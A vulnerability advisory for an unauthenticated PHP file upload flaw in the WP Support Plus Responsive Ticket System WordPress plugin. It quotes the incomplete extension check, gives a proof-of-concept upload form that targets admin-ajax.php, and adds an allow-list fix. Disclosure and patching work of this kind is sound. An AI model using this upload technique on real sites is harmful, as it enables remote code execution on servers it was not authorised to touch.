WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)

WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension was ".php" on most hosting platforms.

This is because "includes/admin/attachment/uploadAttachment.php" contains this code:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');

But it does not check for other extensions like ".phtml". In addition, it saves the file with a predictable name based on the timestamp, and anyone can load the file and run the code it contains.
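One way to close both gaps described above, as an added example that is not the plugin's code or its actual fix: an allow-list extension check shown beside the deny-list logic from the excerpt, plus a random stored name in place of the timestamp. The function names, the allowed-extension list and the sample file names are assumptions; the check also rejects multi-extension names, which goes beyond the case on the page.

```php
<?php
// Added example, not the plugin's code. All names below are hypothetical.

// Deny-list check mirroring the excerpt above: only exe, php and js are refused.
function denylist_allows(string $filename): bool {
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($extension, ['exe', 'php', 'js'], true);
}

// Allow-list check: every dot-separated segment after the base name must be
// a known-safe type, so "a.phtml" and "a.php.png" are both refused.
const ALLOWED_EXTENSIONS = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt']; // assumed policy

function allowlist_allows(string $filename): bool {
    $segments = explode('.', strtolower(basename($filename)));
    if (count($segments) < 2 || $segments[0] === '') {
        return false; // no extension, or a dotfile such as ".htaccess"
    }
    foreach (array_slice($segments, 1) as $segment) {
        if (!in_array($segment, ALLOWED_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

// Stored name comes from a CSPRNG rather than the timestamp, and keeps only the
// validated final extension; the client-supplied base name is discarded.
function stored_name(string $filename): string {
    if (!allowlist_allows($filename)) {
        throw new InvalidArgumentException('file format not supported');
    }
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $extension;
}

// Constructed sample file names.
foreach (['notes.txt', 'shot.PNG', 'a.php', 'a.phtml', 'a.php5', 'a.php.png', '.htaccess'] as $name) {
    printf("%-10s denylist=%-5s allowlist=%s\n", $name,
        denylist_allows($name) ? 'pass' : 'block',
        allowlist_allows($name) ? 'pass' : 'block');
}
echo stored_name('notes.txt'), "\n";
```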

Plugin author notified 2017-11-09.

Proof of Concept

    <form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
        <input type="hidden" name="action" value="wpsp_upload_attachment">
        Choose a file ending with .phtml:
        <input type="file" name="0">
        <input type="submit" value="Submit">
    </form>

After doing this, an uploaded file can be accessed at, say:


Affects Plugin


URL https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system


Type RCE
OWASP Top 10 A1: Injection


Submitter Robert Mathews
Submitter Website https://tigertech.net/
Submitter Twitter @TigerTech
Verified No


Publicly Published 2017-11-11
Added 2017-11-12
Last Updated 2017-11-12
